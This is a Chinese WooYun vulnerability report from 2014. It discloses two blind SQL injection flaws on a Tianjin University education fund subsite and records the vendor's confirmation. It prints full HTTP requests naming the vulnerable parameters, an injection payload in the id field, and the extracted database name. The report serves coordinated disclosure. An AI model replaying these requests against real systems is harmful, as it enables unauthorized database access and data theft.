当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055159

漏洞标题:天津大学某分站SQL注入漏洞两枚

相关厂商:tju.edu.cn

漏洞作者: sex is not show

提交时间:2014-04-01 12:14

修复时间:2014-05-16 12:15

公开时间:2014-05-16 12:15

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-01: 细节已通知厂商并且等待厂商处理中
2014-04-03: 厂商已经确认,细节仅向厂商公开
2014-04-13: 细节向核心白帽子及相关领域专家公开
2014-04-23: 细节向普通白帽子公开
2014-05-03: 细节向实习白帽子公开
2014-05-16: 细节向公众公开

简要描述:

SQL注入漏洞

详细说明:

http://pyedf.tju.edu.cn/ 天津大学 北洋教育发展基金
两枚盲注
POST /order/addorder HTTP/1.1
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=qa8jek4nupljiggvbmd4rbd214
Host: pyedf.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Address=3137%20Laguna%20Street&AlumniInfo=%e6%a0%bc%e5%bc%8f%ef%bc%9a2000-2006%20%e4%b8%ad%e6%96%87%e7%b3%bb%20%e4%b8%ad
%e6%96%87%e4%b8%93%e4%b8%9a&Amount=1&CareerInfo=1&cate_id_info=30&Email=sample%40email.tst&EventName=&Gender=
%e5%85%88%e7%94%9f&IsAlumni=1&IsAnonymous=1&Mobile=1&PayType=1&Phone=555-666-
0606&Postcode=94102&sj=1&SpecialRequest=1&UserName=kdwjtgla&zs=1
cate_id_info参数存在注入
***********************************************************************
GET /service/downloadone?id=-1%27%20or%2074%20%3d%20%2772 HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=qa8jek4nupljiggvbmd4rbd214
Host: pyedf.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
id参数
下面用第一个演示:

1.jpg


current database: 'my_cms'

1.jpg


不多说.. 补吧

漏洞证明:

1.jpg


current database: 'my_cms'

1.jpg

修复方案:

过滤

版权声明:转载请注明来源 sex is not show@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-03 13:30

厂商回复:

已让开发者进行修改,谢谢支持

最新状态:

暂无